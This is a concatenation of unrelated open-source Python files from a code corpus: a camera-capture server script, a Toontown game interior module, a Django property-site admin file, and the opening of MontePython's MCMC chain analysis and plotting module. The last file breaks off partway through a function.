app.pre_queue = Queue(maxsize=QUEUE_MAXSIZE)
app.post_queue = Queue(maxsize=QUEUE_MAXSIZE)
app.server_queue = Queue(maxsize=1)
app.conf_lock = Lock()
# Make main procezs ignore SIGNINT
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
app.capture_th = Capture(app.pre_queue, app.conf, app.conf_lock)
app.processing_th = Processing(app.pre_queue, app.post_queue, app.conf, app.conf_lock)
app.dropbox_th = Dropbox(app.post_queue, app.server_queue, app.conf, app.conf_lock)
app.capture_th.setDevice("video0")
# Launch threads
app.dropbox_th.start()
app.processing_th.start()
app.capture_th.start()
logging.info("Threads started.")
# Restore SIGNINT handler
signal.signal(signal.SIGINT, original_sigint_handler)
# Launch server
rocket_server = Rocket(('localhost', PORT), 'wsgi', {'wsgi_app': app})
app.server_th = Thread(target=rocket_server.start, name='rocket_server')
app.server_th.start()
logging.getLogger("Rocket").setLevel(logging.INFO)
logging.info("Server started.")
try:
while app.server_th.is_alive():
app.server_th.join(1)
except (KeyboardInterrupt, SystemExit):
rocket_server.stop()
logging.info("Server stopped.")
app.capture_th.stop()
app.capture_th.join()
app.processing_th.stop()
app.processing_th.join()
app.dropbox_th.stop()
app.dropbox_th.join()
cv2.destroyAllWindows()
| bsd-3-clause | -800,108,648,192,495,700 | 26.893617 | 130 | 0.745995 | false |
ToonTownInfiniteRepo/ToontownInfinite | toontown/coghq/MintInterior.py | 1 | 10229 | from direct.directnotify import DirectNotifyGlobal
from toontown.battle import BattlePlace
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.showbase import BulletinBoardWatcher
from pandac.PandaModules import *
from otp.distributed.TelemetryLimiter import RotationLimitToH, TLGatherAllAvs
from toontown.toon import Toon
from toontown.toonbase import ToontownGlobals
from toontown.hood import ZoneUtil
from toontown.toonbase import TTLocalizer
from toontown.toontowngui import TTDialog
from toontown.toonbase import ToontownBattleGlobals
from toontown.coghq import DistributedMint
from otp.nametag import NametagGlobals
class MintInterior(BattlePlace.BattlePlace):
notify = DirectNotifyGlobal.directNotify.newCategory('MintInterior')
def __init__(self, loader, parentFSM, doneEvent):
BattlePlace.BattlePlace.__init__(self, loader, doneEvent)
self.parentFSM = parentFSM
self.zoneId = loader.mintId
self.fsm = ClassicFSM.ClassicFSM('MintInterior', [State.State('start', self.enterStart, self.exitStart, ['walk', 'teleportIn', 'fallDown']),
State.State('walk', self.enterWalk, self.exitWalk, ['push',
'sit',
'stickerBook',
'WaitForBattle',
'battle',
'died',
'teleportOut',
'squished',
'DFA',
'fallDown',
'stopped']),
State.State('stopped', self.enterStopped, self.exitStopped, ['walk', 'teleportOut', 'stickerBook']),
State.State('sit', self.enterSit, self.exitSit, ['walk', 'died', 'teleportOut']),
State.State('push', self.enterPush, self.exitPush, ['walk', 'died', 'teleportOut']),
State.State('stickerBook', self.enterStickerBook, self.exitStickerBook, ['walk',
'battle',
'DFA',
'WaitForBattle',
'died',
'teleportOut']),
State.State('WaitForBattle', self.enterWaitForBattle, self.exitWaitForBattle, ['battle',
'walk',
'died',
'teleportOut']),
State.State('battle', self.enterBattle, self.exitBattle, ['walk', 'teleportOut', 'died']),
State.State('fallDown', self.enterFallDown, self.exitFallDown, ['walk', 'died', 'teleportOut']),
State.State('squished', self.enterSquished, self.exitSquished, ['walk', 'died', 'teleportOut']),
State.State('teleportIn', self.enterTeleportIn, self.exitTeleportIn, ['walk',
'teleportOut',
'quietZone',
'died']),
State.State('teleportOut', self.enterTeleportOut, self.exitTeleportOut, ['teleportIn',
'FLA',
'quietZone',
'WaitForBattle']),
State.State('DFA', self.enterDFA, self.exitDFA, ['DFAReject', 'teleportOut']),
State.State('DFAReject', self.enterDFAReject, self.exitDFAReject, ['walkteleportOut']),
State.State('died', self.enterDied, self.exitDied, ['teleportOut']),
State.State('FLA', self.enterFLA, self.exitFLA, ['quietZone']),
State.State('quietZone', self.enterQuietZone, self.exitQuietZone, ['teleportIn']),
State.State('final', self.enterFinal, self.exitFinal, ['start'])], 'start', 'final')
def load(self):
self.parentFSM.getStateNamed('mintInterior').addChild(self.fsm)
BattlePlace.BattlePlace.load(self)
self.music = base.loadMusic('phase_9/audio/bgm/CHQ_FACT_bg.ogg')
def unload(self):
self.parentFSM.getStateNamed('mintInterior').removeChild(self.fsm)
del self.music
del self.fsm
del self.parentFSM
BattlePlace.BattlePlace.unload(self)
def enter(self, requestStatus):
self.fsm.enterInitialState()
base.transitions.fadeOut(t=0)
base.localAvatar.inventory.setRespectInvasions(0)
base.cr.forbidCheesyEffects(1)
self._telemLimiter = TLGatherAllAvs('MintInterior', RotationLimitToH)
def commence(self = self):
NametagGlobals.setMasterArrowsOn(1)
self.fsm.request(requestStatus['how'], [requestStatus])
base.playMusic(self.music, looping=1, volume=0.8)
base.transitions.irisIn()
mint = bboard.get(DistributedMint.DistributedMint.ReadyPost)
self.loader.hood.spawnTitleText(mint.mintId, mint.floorNum)
self.mintReadyWatcher = BulletinBoardWatcher.BulletinBoardWatcher('MintReady', DistributedMint.DistributedMint.ReadyPost, commence)
self.mintDefeated = 0
self.acceptOnce(DistributedMint.DistributedMint.WinEvent, self.handleMintWinEvent)
if __debug__ and 0:
self.accept('f10', lambda : messenger.send(DistributedMint.DistributedMint.WinEvent))
self.confrontedBoss = 0
def handleConfrontedBoss(self = self):
self.confrontedBoss = 1
self.acceptOnce('localToonConfrontedMintBoss', handleConfrontedBoss)
def exit(self):
NametagGlobals.setMasterArrowsOn(0)
bboard.remove(DistributedMint.DistributedMint.ReadyPost)
self._telemLimiter.destroy()
del self._telemLimiter
base.cr.forbidCheesyEffects(0)
base.localAvatar.inventory.setRespectInvasions(1)
self.fsm.requestFinalState()
self.loader.music.stop()
self.music.stop()
self.ignoreAll()
del self.mintReadyWatcher
def enterWalk(self, teleportIn = 0):
BattlePlace.BattlePlace.enterWalk(self, teleportIn)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterPush(self):
BattlePlace.BattlePlace.enterPush(self)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterWaitForBattle(self):
MintInterior.notify.debug('enterWaitForBattle')
BattlePlace.BattlePlace.enterWaitForBattle(self)
if base.localAvatar.getParent() != render:
base.localAvatar.wrtReparentTo(render)
base.localAvatar.b_setParent(ToontownGlobals.SPRender)
def exitWaitForBattle(self):
MintInterior.notify.debug('exitWaitForBattle')
BattlePlace.BattlePlace.exitWaitForBattle(self)
def enterBattle(self, event):
MintInterior.notify.debug('enterBattle')
self.music.stop()
BattlePlace.BattlePlace.enterBattle(self, event)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterTownBattle(self, event):
mult = ToontownBattleGlobals.getMintCreditMultiplier(self.zoneId)
base.localAvatar.inventory.setBattleCreditMultiplier(mult)
self.loader.townBattle.enter(event, self.fsm.getStateNamed('battle'), bldg=1, creditMultiplier=mult)
def exitBattle(self):
MintInterior.notify.debug('exitBattle')
BattlePlace.BattlePlace.exitBattle(self)
self.loader.music.stop()
base.playMusic(self.music, looping=1, volume=0.8)
def enterStickerBook(self, page = None):
BattlePlace.BattlePlace.enterStickerBook(self, page)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterSit(self):
BattlePlace.BattlePlace.enterSit(self)
self.ignore('teleportQuery')
base.localAvatar.setTeleportAvailable(0)
def enterZone(self, zoneId):
pass
def enterTeleportOut(self, requestStatus):
MintInterior.notify.debug('enterTeleportOut()')
BattlePlace.BattlePlace.enterTeleportOut(self, requestStatus, self.__teleportOutDone)
def __processLeaveRequest(self, requestStatus):
hoodId = requestStatus['hoodId']
if hoodId == ToontownGlobals.MyEstate:
self.getEstateZoneAndGoHome(requestStatus)
else:
self.doneStatus = requestStatus
messenger.send(self.doneEvent)
def __teleportOutDone(self, requestStatus):
MintInterior.notify.debug('__teleportOutDone()')
messenger.send('leavingMint')
messenger.send('localToonLeft')
if self.mintDefeated and not self.confrontedBoss:
self.fsm.request('FLA', [requestStatus])
else:
self.__processLeaveRequest(requestStatus)
def exitTeleportOut(self):
MintInterior.notify.debug('exitTeleportOut()')
BattlePlace.BattlePlace.exitTeleportOut(self)
def handleMintWinEvent(self):
MintInterior.notify.debug('handleMintWinEvent')
if base.cr.playGame.getPlace().fsm.getCurrentState().getName() == 'died':
return
self.mintDefeated = 1
if 1:
zoneId = ZoneUtil.getHoodId(self.zoneId)
else:
zoneId = ZoneUtil.getSafeZoneId(base.localAvatar.defaultZone)
self.fsm.request('teleportOut', [{'loader': ZoneUtil.getLoaderName(zoneId),
'where': ZoneUtil.getToonWhereName(zoneId),
'how': 'teleportIn',
'hoodId': zoneId,
'zoneId': zoneId,
'shardId': None,
'avId': -1}])
def enterDied(self, requestStatus, callback = None):
MintInterior.notify.debug('enterDied')
def diedDone(requestStatus, self = self, callback = callback):
if callback is not None:
callback()
messenger.send('leavingMint')
self.doneStatus = requestStatus
messenger.send(self.doneEvent)
return
BattlePlace.BattlePlace.enterDied(self, requestStatus, diedDone)
def enterFLA(self, requestStatus):
MintInterior.notify.debug('enterFLA')
self.flaDialog = TTDialog.TTGlobalDialog(message=TTLocalizer.ForcedLeaveMintAckMsg, doneEvent='FLADone', style=TTDialog.Acknowledge, fadeScreen=1)
def continueExit(self = self, requestStatus = requestStatus):
self.__processLeaveRequest(requestStatus)
self.accept('FLADone', continueExit)
self.flaDialog.show()
def exitFLA(self):
MintInterior.notify.debug('exitFLA')
if hasattr(self, 'flaDialog'):
self.flaDialog.cleanup()
del self.flaDialog
| mit | 7,421,334,415,014,637,000 | 41.620833 | 154 | 0.655587 | false |
signalfire/django-property | homes/admin.py | 1 | 2271 | from mapwidgets.widgets import GooglePointFieldWidget
from django.contrib import admin
from django.contrib.gis.db import models
from django.utils.translation import ugettext as _
from homes.models import Block, Banner, SEO, SearchPrice, Branch, PropertyTenure, PropertyType, Alert, MediaType
class SearchPriceAdmin(admin.ModelAdmin):
fields = ('type', 'label', 'price')
class BranchAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',), }
fieldsets = (
(_('General'), {
'fields': ['name', 'slug', 'status']
}),
(_('Address'), {
'fields': ['address_1', 'address_2', 'address_3', 'town_city', 'county', 'postcode'],
}),
(_('Geographic'), {
'fields': ['location']
}),
(_('Contact'), {
'fields': ['telephone', 'email']
}),
(_('Details'), {
'fields': ['details', 'opening_hours']
})
)
formfield_overrides = {
models.PointField: {"widget": GooglePointFieldWidget}
}
class Media:
css = {
'all':['build/css/admin/override/map.min.css']
}
class PropertyTypeAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class MediaTypeAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class PropertyTenureAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class BlockAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',), }
list_display = ('name', 'slug')
fields = ('name','slug','content','status')
class BannerAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('title',), }
list_display = ('title', 'slug', 'action', 'label')
fields = ('title', 'subtitle', 'action', 'label', 'slug', 'attachment', 'status')
class SEOAdmin(admin.ModelAdmin):
list_display = ('url', 'title')
admin.site.register(SearchPrice, SearchPriceAdmin)
admin.site.register(Branch, BranchAdmin)
admin.site.register(Banner, BannerAdmin)
admin.site.register(PropertyType, PropertyTypeAdmin)
admin.site.register(PropertyTenure, PropertyTenureAdmin)
admin.site.register(MediaType, MediaTypeAdmin)
admin.site.register(Block, BlockAdmin)
admin.site.register(SEO, SEOAdmin)
admin.site.register(Alert)
| mit | 5,921,387,022,681,501,000 | 28.115385 | 112 | 0.630559 | false |
miguelzuma/montepython_zuma | montepython/analyze.py | 1 | 95056 | """
.. module:: analyze
:synopsis: Extract data from chains and produce plots
.. moduleauthor:: Karim Benabed <[email protected]>
.. moduleauthor:: Benjamin Audren <[email protected]>
Collection of functions needed to analyze the Markov chains.
This module defines as well a class :class:`Information`, that stores useful
quantities, and shortens the argument passing between the functions.
.. note::
Some of the methods used in this module are directly adapted from the
`CosmoPmc <http://www.cosmopmc.info>`_ code from Kilbinger et. al.
"""
import os
import math
import numpy as np
from itertools import count
# The root plotting module, to change options like font sizes, etc...
import matplotlib
# The following line suppresses the need for an X server
matplotlib.use("Agg")
# Module for handling display
import matplotlib.pyplot as plt
# Module to handle warnings from matplotlib
import warnings
import importlib
import io_mp
from itertools import ifilterfalse
from itertools import ifilter
import scipy.ndimage
# Defined to remove the burnin for all the points that were produced before the
# first time where -log-likelihood <= min-minus-log-likelihood+LOG_LKL_CUTOFF
LOG_LKL_CUTOFF = 3
NUM_COLORS = 6
def analyze(command_line):
"""
Main function, does the entire analysis.
It calls in turn all the other routines from this module. To limit the
arguments of each function to a reasonnable size, a :class:`Information`
instance is used. This instance is initialized in this function, then
appended by the other routines.
"""
# Check if the scipy module has the interpolate method correctly
# installed (should be the case on every linux distribution with
# standard numpy)
try:
from scipy.interpolate import interp1d
Information.has_interpolate_module = True
except ImportError:
Information.has_interpolate_module = False
warnings.warn(
'No cubic interpolation done (no interpolate method found ' +
'in scipy), only linear')
# Determine how many different folders are asked through the 'info'
# command, and create as many Information instances
files = separate_files(command_line.files)
# Create an instance of the Information class for each subgroup found in
# the previous function. They will each hold all relevant information, and
# be used as a compact way of exchanging information between functions
information_instances = []
for item in files:
info = Information(command_line)
information_instances.append(info)
# Prepare the files, according to the case, load the log.param, and
# prepare the output (plots folder, .covmat, .info and .log files).
# After this step, info.files will contain all chains.
status = prepare(item, info)
# If the preparation step generated new files (for instance,
# translating from NS or CH to Markov Chains) this routine should stop
# now.
if not status:
return
# Compute the mean, maximum of likelihood, 1-sigma variance for this
# main folder. This will create the info.chain object, which contains
# all the points computed stacked in one big array.
convergence(info)
# check if analyze() is called directly by the user, or by the mcmc loop during an updating phase
try:
# command_line.update is defined when called by the mcmc loop
command_line.update
except:
# in case it was not defined (i.e. when analyze() is called directly by user), set it to False
command_line.update = 0
# compute covariance matrix, excepted when we are in update mode and convergence is too bad or too good
if command_line.update and (np.amax(info.R) > 3. or np.amax(info.R) < 0.4):
print '--> Not computing covariance matrix'
else:
try:
if command_line.want_covmat:
print '--> Computing covariance matrix'
info.covar = compute_covariance_matrix(info)
# Writing it out in name_of_folder.covmat
io_mp.write_covariance_matrix(
info.covar, info.backup_names, info.cov_path)
except:
print '--> Computing covariance matrix failed'
pass
# Store an array, sorted_indices, containing the list of indices
# corresponding to the line with the highest likelihood as the first
# element, and then as decreasing likelihood
info.sorted_indices = info.chain[:, 1].argsort(0)
# Writing the best-fit model in name_of_folder.bestfit
bestfit_line = [elem*info.scales[i, i] for i, elem in
enumerate(info.chain[info.sorted_indices[0], 2:])]
io_mp.write_bestfit_file(bestfit_line, info.backup_names,
info.best_fit_path)
if not command_line.minimal:
# Computing 1,2 and 3-sigma errors, and plot. This will create the
# triangle and 1d plot by default.
compute_posterior(information_instances)
print '--> Writing .info and .tex files'
for info in information_instances:
info.write_information_files()
# when called by MCMC in update mode, return R values so that they can be written for information in the chains
if command_line.update:
return info.R
def prepare(files, info):
"""
Scan the whole input folder, and include all chains in it.
Since you can decide to analyze some file(s), or a complete folder, this
function first needs to separate between the two cases.
.. warning::
If someday you change the way the chains are named, remember to change
here too, because this routine assumes the chains have a double
underscore in their names.
.. note::
Only files ending with .txt will be selected, to keep compatibility
with CosmoMC format
.. note::
New in version 2.0.0: if you ask to analyze a Nested Sampling
sub-folder (i.e. something that ends in `NS` with capital letters), the
analyze module will translate the output from Nested Sampling to
standard chains for Monte Python, and stops. You can then run the
`-- info` flag on the whole folder. **This procedure is not necessary
if the run was complete, but only if the Nested Sampling run was killed
before completion**.
Parameters
----------
files : list
list of potentially only one element, containing the files to analyze.
This can be only one file, or the encompassing folder, files
info : Information instance
Used to store the result
"""
# First test if the folder is a Nested Sampling or CosmoHammer folder. If
# so, call the module's own routine through the clean conversion function,
# which will translate the output of this other sampling into MCMC chains
# that can then be analyzed.
modules = ['nested_sampling', 'cosmo_hammer']
tags = ['NS', 'CH']
for module_name, tag in zip(modules, tags):
action_done = clean_conversion(module_name, tag, files[0])
if action_done:
return False
# If the input command was an entire folder, then grab everything in it.
# Too small files (below 600 octets) and subfolders are automatically
# removed.
folder, files, basename = recover_folder_and_files(files)
info.files = files
info.folder = folder
info.basename = basename
# Check if the log.param file exists
parameter_file_path = os.path.join(folder, 'log.param')
if os.path.isfile(parameter_file_path):
if os.path.getsize(parameter_file_path) == 0:
raise io_mp.AnalyzeError(
"The log param file %s " % os.path.join(folder, 'log.param') +
"seems empty")
else:
raise io_mp.AnalyzeError(
"The log param file %s " % os.path.join(folder, 'log.param') +
"is missing in the analyzed folder?")
# If the folder has no subdirectory, then go for a simple infoname,
# otherwise, call it with the last name
basename = (os.path.basename(folder) if os.path.basename(folder) != '.'
else os.path.basename(os.path.abspath(
os.path.join(folder, '..'))))
info.v_info_path = os.path.join(folder, basename+'.v_info')
info.h_info_path = os.path.join(folder, basename+'.h_info')
info.tex_path = os.path.join(folder, basename+'.tex')
info.cov_path = os.path.join(folder, basename+'.covmat')
info.log_path = os.path.join(folder, basename+'.log')
info.best_fit_path = os.path.join(folder, basename+'.bestfit')
info.param_path = parameter_file_path
return True
def convergence(info):
"""
Compute convergence for the desired chains, using Gelman-Rubin diagnostic
Chains have been stored in the info instance of :class:`Information`. Note
that the G-R diagnostic can be computed for a single chain, albeit it will
most probably give absurd results. To do so, it separates the chain into
three subchains.
"""
# Recovering parameter names and scales, creating tex names,
extract_parameter_names(info)
# Now that the number of parameters is known, the array containing bounds
# can be initialised
info.bounds = np.zeros((len(info.ref_names), len(info.levels), 2))
# Circle through all files to find the global maximum of likelihood
#print '--> Finding global maximum of likelihood'
find_maximum_of_likelihood(info)
# Restarting the circling through files, this time removing the burnin,
# given the maximum of likelihood previously found and the global variable
# LOG_LKL_CUTOFF. spam now contains all the accepted points that were
# explored once the chain moved within min_minus_lkl - LOG_LKL_CUTOFF.
# If the user asks for a keep_fraction <1, this is also the place where
# a fraction (1-keep_fraction) is removed at the beginning of each chain.
#print '--> Removing burn-in'
spam = remove_bad_points(info)
info.remap_parameters(spam)
# Now that the list spam contains all the different chains removed of
# their respective burn-in, proceed to the convergence computation
# 2D arrays for mean and var, one column will contain the total (over
# all chains) mean (resp. variance), and each other column the
# respective chain mean (resp. chain variance). R only contains the
# values for each parameter. Therefore, mean and var will have len(spam)+1
# as a first dimension
mean = np.zeros((len(spam)+1, info.number_parameters))
var = np.zeros((len(spam)+1, info.number_parameters))
R = np.zeros(info.number_parameters)
# Store the total number of points, and the total in each chain
total = np.zeros(len(spam)+1)
for j in xrange(len(spam)):
total[j+1] = spam[j][:, 0].sum()
total[0] = total[1:].sum()
# Compute mean and variance for each chain
print '--> Computing mean values'
compute_mean(mean, spam, total)
print '--> Computing variance'
compute_variance(var, mean, spam, total)
print '--> Computing convergence criterium (Gelman-Rubin)'
# Gelman Rubin Diagnostic:
# Computes a quantity linked to the ratio of the mean of the variances of
# the different chains (within), and the variance of the means (between)
# Note: This is not strictly speaking the Gelman Rubin test, defined for
# same-length MC chains. Our quantity is defined without the square root,
# which should not change much the result: a small sqrt(R) will still be a
# small R. The same convention is used in CosmoMC, except for the weighted
# average: we decided to do the average taking into account that longer
# chains should count more
within = 0
between = 0
for i in xrange(np.shape(mean)[1]):
for j in xrange(len(spam)):
within += total[j+1]*var[j+1, i]
between += total[j+1]*(mean[j+1, i]-mean[0, i])**2
within /= total[0]
between /= (total[0]-1)
R[i] = between/within
if i == 0:
print ' -> R-1 is %.6f' % R[i], '\tfor ', info.ref_names[i]
else:
print ' %.6f' % R[i], '\tfor ', info.ref_names[i]
# Log finally the total number of steps, and absolute loglikelihood
with open(info.log_path, 'a') as log:
log.write("--> Total number of steps: %d\n" % (
info.steps))
log.write("--> Total number of accepted steps: %d\n" % (
info.accepted_steps))
log.write("--> Minimum of -logLike : %.2f" % (
info.min_minus_lkl))
# Store the remaining members in the info instance, for further writing to
# files, storing only the mean and total of all the chains taken together
info.mean = mean[0]
info.R = R
info.total = total[0]
# Create the main chain, which consists in all elements of spam
# put together. This will serve for the plotting.
info.chain = np.vstack(spam)
def compute_posterior(information_instances):
"""
computes the marginalized posterior distributions, and optionnally plots
them
Parameters
----------
information_instances : list
list of information objects, initialised on the given folders, or list
of file, in input. For each of these instance, plot the 1d and 2d
posterior distribution, depending on the flags stored in the instances,
comming from command line arguments or read from a file.
"""
# For convenience, store as `conf` the first element of the list
# information_instances, since it will be called often to check for
# configuration parameters
conf = information_instances[0]
# Pre configuration of the output, note that changes to the font size
# will occur later on as well, to obtain a nice scaling.
matplotlib.rc('text', usetex=True)
matplotlib.rc('font', size=11)
matplotlib.rc('xtick', labelsize='8')
matplotlib.rc('ytick', labelsize='8')
# Recover max and min values for each instance, defining the a priori place
# of ticks (in case of a comparison, this should change)
for info in information_instances:
info.define_ticks()
# If plots/ folder in output folder does not exist, create it
if os.path.isdir(os.path.join(info.folder, 'plots')) is False:
os.mkdir(os.path.join(info.folder, 'plots'))
# Determine the total number of parameters to plot, based on the list
# without duplicates of the plotted parameters of all information instances
plotted_parameters = []
# For printing not in latex
ref_names = []
for info in information_instances:
for index, name in enumerate(info.plotted_parameters):
if name not in plotted_parameters:
plotted_parameters.append(name)
ref_names.append(info.ref_names[index])
if len(plotted_parameters) == 0:
raise io_mp.AnalyzeError(
"You provided no parameters to analyze, probably by selecting"
" wrong parameters names in the '--extra' file.")
# Find the appropriate number of columns and lines for the 1d posterior
# plot
if conf.num_columns_1d == None:
num_columns = int(round(math.sqrt(len(plotted_parameters))))
else:
num_columns = conf.num_columns_1d
num_lines = int(math.ceil(len(plotted_parameters)*1.0/num_columns))
# For special needs, you can impose here a different number of columns and lines in the 1d plot
# Here is a commented example:
# if (len(plotted_parameters) == 10):
# num_columns = 5
# num_lines = 2
# Create the figures
# which will be 3*3 inches per subplot, quickly growing!
if conf.plot:
fig1d = plt.figure(num=1, figsize=(
3*num_columns,
3*num_lines), dpi=80)
if conf.plot_2d:
fig2d = plt.figure(num=2, figsize=(
3*len(plotted_parameters),
3*len(plotted_parameters)), dpi=80)
# Create the name of the files, concatenating the basenames with
# underscores.
file_name = "_".join(
[info.basename for info in information_instances])
# Loop over all the plotted parameters
# There will be two indices at all time, the one running over the plotted
# parameters, `index`, and the one corresponding to the actual column in
# the actual file, `native_index`. For instance, if you try to plot only
# two columns of a several columns file, index will vary from 0 to 1, but
# the corresponding native indices might be anything.
# Obviously, since plotted parameters contain potentially names not
# contained in some files (in case of a comparison), native index might be
# undefined.
# Defined the legends object, which will store the plot style, to display
# at the level of the figure
legends = [None for _ in range(len(information_instances))]
if not conf.legendnames:
legend_names = [info.basename.replace('_', ' ')
for info in information_instances]
else:
legend_names = conf.legendnames
print '-----------------------------------------------'
for index, name in enumerate(plotted_parameters):
# Adding the subplots to the respective figures, this will correspond
# to the diagonal on the triangle plot.
if conf.plot_2d:
ax2d = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
index*(len(plotted_parameters)+1)+1,
yticks=[])
if conf.plot:
ax1d = fig1d.add_subplot(
num_lines, num_columns, index+1, yticks=[])
# check for each instance if the name is part of the list of plotted
# parameters, and if yes, store the native_index. If not, store a flag
# to ignore any further plotting or computing issues concerning this
# particular instance.
for info in information_instances:
try:
info.native_index = info.ref_names.index(name)
info.ignore_param = False
standard_name = info.backup_names[info.native_index]
except ValueError:
info.ignore_param = True
# The limits might have been enforced by the user
if name in conf.force_limits.iterkeys():
x_span = conf.force_limits[name][1]-conf.force_limits[name][0]
tick_min = conf.force_limits[name][0] +0.1*x_span
tick_max = conf.force_limits[name][1] -0.1*x_span
ticks = np.linspace(tick_min,
tick_max,
info.ticknumber)
for info in information_instances:
if not info.ignore_param:
info.x_range[info.native_index] = conf.force_limits[name]
info.ticks[info.native_index] = ticks
# otherwise, find them automatically
else:
adjust_ticks(name, information_instances)
print ' -> Computing histograms for ', name
for info in information_instances:
if not info.ignore_param:
# 1D posterior normalised to P_max=1 (first step)
#
# simply the histogram from the chains, with few bins
#
info.hist, info.bin_edges = np.histogram(
info.chain[:, info.native_index+2], bins=info.bins,
weights=info.chain[:, 0], normed=False, density=False)
info.hist = info.hist/info.hist.max()
info.bincenters = 0.5*(info.bin_edges[1:]+info.bin_edges[:-1])
# 1D posterior normalised to P_max=1 (second step)
#
# returns a histogram still normalised to one, but with a ten times finer sampling;
# >> first, tries a method with spline interpolation between bin centers and extrapolation at the edges
# >> if it fails, a simpler and more robust method of linear interpolation between bin centers is used
# >> if the interpolation module is not installed, this step keeps the same posterior
#
info.interp_hist, info.interp_grid = cubic_interpolation(
info, info.hist, info.bincenters)
# minimum credible interval (method by Jan Haman). Fails for
# multimodal histograms
bounds = minimum_credible_intervals(info)
info.bounds[info.native_index] = bounds
# plotting
for info in information_instances:
if not info.ignore_param:
# 1D posterior normalised to P_max=1 (third step, used only for plotting)
#
# apply gaussian smoothing
#
# factor by which the grid has been made thinner (10 means 10 times more bins)
interpolation_factor = float(len(info.interp_grid))/float(len(info.bincenters))
# factor for gaussian smoothing
sigma = interpolation_factor*info.gaussian_smoothing
# smooth
smoothed_interp_hist = scipy.ndimage.filters.gaussian_filter(info.interp_hist,sigma)
# re-normalised
smoothed_interp_hist = smoothed_interp_hist/smoothed_interp_hist.max()
if conf.plot_2d:
##################################################
# plot 1D posterior in diagonal of triangle plot #
##################################################
plot = ax2d.plot(
info.interp_grid,
smoothed_interp_hist,
linewidth=info.line_width, ls='-',
color = info.MP_color_cycle[info.id][1],
# the [1] picks up the color of the 68% contours
# with [0] you would get that of the 95% contours
alpha = info.alphas[info.id])
legends[info.id] = plot[0]
ax2d.set_xticks(info.ticks[info.native_index])
if conf.legend_style == 'top':
ax2d.set_title(
'%s=$%.{0}g^{{+%.{0}g}}_{{%.{0}g}}$'.format(
info.decimal) % (
info.tex_names[info.native_index],
info.mean[info.native_index],
info.bounds[info.native_index, 0, -1],
info.bounds[info.native_index, 0, 0]),
fontsize=info.fontsize)
ax2d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
elif conf.legend_style == 'sides':
# Except for the last 1d plot (bottom line), don't
# print ticks
if index == len(plotted_parameters)-1:
ax2d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
ax2d.tick_params('x',direction='inout')
ax2d.set_xlabel(
info.tex_names[info.native_index],
fontsize=info.fontsize)
else:
ax2d.set_xticklabels([])
ax2d.axis([info.x_range[info.native_index][0],
info.x_range[info.native_index][1],
0, 1.05])
if conf.plot:
if conf.short_title_1d:
ax1d.set_title(
'%s'.format(info.decimal) % (
info.tex_names[info.native_index]),
fontsize=info.fontsize)
else:
# Note the use of double curly brackets {{ }} to produce
# the desired LaTeX output. This is necessary because the
# format function would otherwise understand single
# brackets as fields.
ax1d.set_title(
'%s=$%.{0}g^{{+%.{0}g}}_{{%.{0}g}}$'.format(
info.decimal) % (
info.tex_names[info.native_index],
info.mean[info.native_index],
info.bounds[info.native_index, 0, -1],
info.bounds[info.native_index, 0, 0]),
fontsize=info.fontsize)
ax1d.set_xticks(info.ticks[info.native_index])
ax1d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
ax1d.axis([info.x_range[info.native_index][0],
info.x_range[info.native_index][1],
0, 1.05])
# Execute some customisation scripts for the 1d plots
if (info.custom1d != []):
for elem in info.custom1d:
execfile('plot_files/'+elem)
##################################################
# plot 1D posterior in 1D plot #
##################################################
ax1d.plot(
info.interp_grid,
# gaussian filtered 1d posterior:
smoothed_interp_hist,
# raw 1d posterior:
#info.interp_hist,
lw=info.line_width, ls='-',
color = info.MP_color_cycle[info.id][1],
# the [1] picks up the color of the 68% contours
# with [0] you would get that of the 95% contours
alpha = info.alphas[info.id])
# uncomment if you want to see the raw points from the histogram
# (to check whether the inteprolation and smoothing generated artefacts)
#ax1d.plot(
# info.bincenters,
# info.hist,
# 'ro')
if conf.mean_likelihood:
for info in information_instances:
if not info.ignore_param:
try:
# 1D mean likelihood normalised to P_max=1 (first step)
#
# simply the histogram from the chains, weighted by mutiplicity*likelihood
#
lkl_mean, _ = np.histogram(
info.chain[:, info.native_index+2],
bins=info.bin_edges,
normed=False,
weights=np.exp(
conf.min_minus_lkl-info.chain[:, 1])*info.chain[:, 0])
lkl_mean /= lkl_mean.max()
# 1D mean likelihood normalised to P_max=1 (second step)
#
# returns a histogram still normalised to one, but with a ten times finer sampling;
# >> first, tries a method with spline interpolation between bin centers and extrapolation at the edges
# >> if it fails, a simpler and more robust method of linear interpolation between bin centers is used
# >> if the interpolation module is not installed, this step keeps the same posterior
#
interp_lkl_mean, interp_grid = cubic_interpolation(
info, lkl_mean, info.bincenters)
# 1D mean likelihood normalised to P_max=1 (third step, used only for plotting)
#
# apply gaussian smoothing
#
# smooth
smoothed_interp_lkl_mean = scipy.ndimage.filters.gaussian_filter(interp_lkl_mean,sigma)
# re-normalised
smoothed_interp_lkl_mean = smoothed_interp_lkl_mean/smoothed_interp_lkl_mean.max()
# Execute some customisation scripts for the 1d plots
if (info.custom1d != []):
for elem in info.custom1d:
execfile('plot_files/'+elem)
########################################################
# plot 1D mean likelihood in diagonal of triangle plot #
########################################################
if conf.plot_2d:
# raw mean likelihoods:
#ax2d.plot(info.bincenter, lkl_mean,
# ls='--', lw=conf.line_width,
# color = info.MP_color_cycle[info.id][1],
# alpha = info.alphas[info.id])
# smoothed and interpolated mean likelihoods:
ax2d.plot(interp_grid, smoothed_interp_lkl_mean,
ls='--', lw=conf.line_width,
